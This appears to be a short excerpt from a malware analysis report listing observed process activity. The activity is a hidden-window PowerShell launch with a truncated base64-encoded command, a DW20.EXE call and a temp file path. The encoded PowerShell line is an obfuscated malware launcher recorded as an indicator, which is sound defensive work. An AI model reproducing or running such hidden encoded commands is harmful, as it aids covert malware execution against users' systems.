Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABZAGEAZgBmAHUAawBuAGIAZwBlAD0AJwBVAHQAbQBuAHUAeQByAHYAeQAnADsAJABLAGUAaABvAGwAbwBlAG4AdQBzAGIAIAA9ACAAJwA2ADIAOQAnADsAJABaAHYAZwBuAGsAZwB4AHEAdwBzAGcAPQAnAE4...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1468
- %TEMP%\1387644.cvr